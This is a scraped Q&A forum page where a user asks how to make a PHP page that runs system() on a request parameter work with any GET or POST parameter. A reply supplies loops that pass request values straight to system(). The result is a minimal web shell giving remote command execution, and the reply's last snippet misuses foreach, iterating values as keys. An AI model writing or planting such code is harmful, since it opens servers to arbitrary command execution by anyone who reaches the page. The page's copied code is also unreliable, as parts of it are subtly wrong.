drt12345678 2017-02-16 16:24
浏览 72

php - 通过任何参数和任何方法获取值

I'm trying to make a simple page command execution vulnerability... This is my code:

system($_GET['cmd']);

It is working fine, like this : http://example/index.php?cmd=ls

The problem is I want make this little code to work with any parameter and any method (GET or POST)

For example, if any parameter is used then it will still pass through the system method, ie: "?hello=ls". (I did not know they where to use hello as the key. Any ideas?

  • 写回答

2条回答 默认 最新

  • doq70020 2017-02-16 16:30
    关注

    You could store each index key in an array then loop the set value.

    $keys = ['cmd', 'hello', 'etc..']; // jus add your params

// GET params
foreach($keys as $_key) {
    if(isset($_GET[$_key]) && !empty($_GET[$_key])) {
        system($_GET[$_key]);
    }
}

// POST params
foreach($keys as $_key) {
    if(isset($_POST[$_key]) && !empty($_POST[$_key])) {
        system($_POST[$_key]);
    }
}

    If you do not want to know the key to the POST/GET then:

    foreach($_GET as $key) {
    system($_GET[$key]);
}

foreach($_POST as $key) {
    system($_POST[$key]);
}
    评论

报告相同问题?

悬赏问题

  • ¥15 HFSS 中的 H 场图与 MATLAB 中绘制的 B1 场 部分对应不上
  • ¥15 如何在scanpy上做差异基因和通路富集?
  • ¥20 关于#硬件工程#的问题,请各位专家解答!
  • ¥15 关于#matlab#的问题:期望的系统闭环传递函数为G(s)=wn^2/s^2+2¢wn+wn^2阻尼系数¢=0.707,使系统具有较小的超调量
  • ¥15 FLUENT如何实现在堆积颗粒的上表面加载高斯热源
  • ¥30 截图中的mathematics程序转换成matlab
  • ¥15 动力学代码报错,维度不匹配
  • ¥15 Power query添加列问题
  • ¥50 Kubernetes&Fission&Eleasticsearch
  • ¥15 報錯:Person is not mapped,如何解決?